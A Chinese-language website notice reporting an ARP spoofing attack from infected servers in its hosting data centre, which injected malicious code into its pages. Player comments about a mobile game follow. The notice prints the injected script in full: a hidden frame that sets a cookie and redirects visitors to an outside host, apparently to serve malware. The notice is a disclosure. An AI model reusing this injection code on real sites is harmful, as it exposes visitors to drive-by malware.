关于最近服务器被ARP攻击的说明

从昨天下午开始,我们的新服务器一直不稳定,并且在页面上发现了恶意代码,刚开始我们以为是服务器被黑客攻陷了,但经过排查并未发现服务器异常;后来经过调查,才知道原因竟然是我们的新服务器所在机房 – 浙江温州电信IDC机房2台服务器感染了ARP病毒,然后它们给我站服务器发送ARP欺骗数据包,导致我们网站上面的所有页面在传输过程中均被植入以下恶意代码:

<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf(“CK”);
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie=”CK=test;expires=”+EP.toGMTString();
self.hi.location=”http://ff.best320.info:171/360/index.html?id=7003″;}
}
</script>
<frameset rows=”100%,*” onLoad=”showme()”>
<frame name=”hello” src=”/ifd?UpdatedPage=aGlqYWNr”>
<frame name=”hi” src=””>
</frameset>
</html>

经过我们的技术人员测试之后,确定为ARP攻击所造成恶意代码被植入我们的页面!
于是我们紧急购置了专业级的ARP防火墙,目前已经成功抵御了攻击。

这让我不得不对ARP攻击多了一份“敬畏”,这样竟然可以在页面里面挂马!!
直至现在,机房竟然还未将感染ARP病毒的服务器做隔离处理!

此外,我们向广大用户郑重承诺:我们绝对不会在本站的任何页面内植入恶意代码!如果用户在访问本站时被提示发现恶意代码,很有可能是杀毒软件误报本站被黑客攻陷后被植入恶意代码,如果遇到后面这种情况,24小时之内勿再次尝试登陆,请立即全面杀毒。如果服务器被攻陷,我们会立即尽快解决,必要时会向网络公安报案处理

文章标签:,

目前有14条评论 。

  1. 12说道:

    为什么魔界上不了

  2. 12说道:

    但是象我们这样很喜欢魔界的人真的很想在这玩,这网站还是不错的,流量真的很快用完。谢谢

  3. 12说道:

    我也可以帮你们宣传,那里面很多人都不知道,他们还用钱去求购电脑上的

  4. 12说道:

    可以开启魔界吗,我希望睡个觉,这个梦想可以实现,谢谢

  5. 魔界说道:

    什么时候可以上魔界啊

  6. 空间说道:

    是不是电脑上幻想被封了,今天一直上不了

  7. CGVC说道:

    网管啊,这网站的魔界是不是被封了啊,快调整下

  8. HAO说道:

    我是玩魔界的啊 赶紧弄啊

  9. hvggggggggv说道:

    欢迎来到魔界,请您使用手机进行访问。
    UCWEB用户请关闭服务器中转选项,选择WAP直连
    如果还有问题请联系客服中心,客服电话:010-63168058
    这是怎么回事啊

  10. f1194361820说道:

    我怎么不能登陆wap网游轮回oline

  11. 祂丶仰视45度说道:

    怎么手机WAP网游轮回一进游戏就出现这个提示无法进入
    请使用手机访问本游戏,谢谢合作!(IP:119.62.128.38)
    有什么办法解决么?